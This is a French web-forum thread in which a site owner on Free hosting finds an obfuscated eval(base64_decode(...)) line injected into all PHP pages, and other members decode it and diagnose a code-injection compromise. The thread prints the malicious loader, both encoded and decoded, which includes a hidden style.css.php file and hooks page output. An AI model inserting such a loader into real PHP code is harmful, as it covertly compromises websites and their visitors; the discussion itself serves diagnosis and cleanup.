Bonjour et BONNE ANNÉE A TOUTES ET TOUS !!!

Que cette année soit signe de chance, amour, gloire et ...beauté

Je reviens vers vous car j'ai un site perso hébergé chez free qui a un comportement bizarre.

Le fichier index.php est reconnu mais pas les autres pages. Pourtant celles-ci sont construites de la même façon, elles sont bien présentes physiquement sur le serveur, ma base de données tourne, c'est bizarre comme truc, non ?

Vous avez vent de quelque chose ? Ca peut venir de quoi cette histoire ?

Bien à vous

Foetus69

Bonjour,

Le fichier index.php est reconnu mais pas les autres pages.

C'est un peu vague comme description du problème...
Tu as un message d'erreur? un lien à partager qu'on voit le problème?

Coucou,

J'ai retrouvé ceci dans toutes mes pages php :

<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy9tbnQvMTQ0L3NkYi9jLzgvdmxzNzYvcGhwbXYyL2xpYnMvSHRtbC9RdWlja0Zvcm0vUnVsZS9zdHlsZS5jc3MucGhwJztpZihmaWxlX2V4aXN0cygkR0xPQkFMU1snbWZzbiddKSl7aW5jbHVkZV9vbmNlKCRHTE9CQUxTWydtZnNuJ10pO2lmKGZ1bmN0aW9uX2V4aXN0cygnZ21sJykmJmZ1bmN0aW9uX2V4aXN0cygnZGdvYmgnKSl7b2Jfc3RhcnQoJ2Rnb2JoJyk7fX19')); ?>

C'est quoi ? Comment c'est arrivé là ?

salut,

en affichant le contenu de la chaine on obtient

if(function_exists('ob_start')&&!isset($GLOBALS['mfsn'])){$GLOBALS['mfsn']='/mnt/*******************/style.css.php';if(file_exists($GLOBALS['mfsn'])){include_once($GLOBALS['mfsn']);if(function_exists('gml')&&function_exists('dgobh')){ob_start('dgobh');}}}

eval étant la pour faire fonctionner le tout.

si cela correspond à ton code je dirais qu'il y a eu un script "foireux" qui a mis le brin la dedans.

regarde s'il n'y a pas un script que tu ne connais pas et la date de dernier enregistrement des fichiers (pas la date de dernier accès )

@+

Cela ressemble tout simplement à une injection de code.
Un petit malin qui a trouvé une faille dans ton code et qui l'a exploité pour y insérer le sien.

Regardes donc le fichier style.css.php et tu devrais y trouver des instructions malhonnêtes. è_é

Cela ressemble tout simplement à une injection de code.
Un petit malin qui a trouvé une faille dans ton code et qui l'a exploité pour y insérer le sien.

Regardes donc le fichier style.css.php et tu devrais y trouver des instructions malhonnêtes. è_é

+1

Je parie que tu as sur ton espace d'hébergement un script PHP clé-en-main qui n'est pas à jour (phpBB, phpMyVisites, Wordpress, etc...)

OOo Dommage que ce soit ça, j'aurais tellement voulu sortir

Je reviens vers vous car j'ai un site perso hébergé chez free qui a un comportement bizarre.

Quoi de plus normal ?

Bonjour Messieurs,

Oui c'est bien cela, free, moi ou les autres contributeurs FTP avons été victimes d'un trojan.

J'ai fait un annule et remplace massif et ca refonctionne.

Merci de votre aide.